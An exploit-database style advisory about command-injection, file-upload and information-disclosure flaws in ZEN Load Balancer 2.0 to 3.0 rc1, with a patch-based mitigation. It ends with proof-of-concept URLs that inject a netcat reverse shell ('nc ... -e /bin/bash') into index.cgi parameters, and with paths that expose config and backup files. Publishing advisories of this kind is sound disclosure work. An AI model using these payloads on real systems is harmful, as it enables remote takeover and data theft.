ZEN Load Balancer Security Vulnerabilities

vendor:

ZEN Load Balancer

by:

SecurityFocus

7,5

CVSS

HIGH

Multiple arbitrary command-execution vulnerabilities, Multiple information-disclosure vulnerabilities, An arbitrary file-upload vulnerability

78, 200, 264

CWE

Product Name: ZEN Load Balancer

Affected Version From: 2.0

Affected Version To: 3.0 rc1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

ZEN Load Balancer Security Vulnerabilities

An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.

Mitigation:

Update to the latest version of ZEN Load Balancer

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55638/info

ZEN Load Balancer is prone to the following security vulnerabilities:

1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.

ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. 

http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/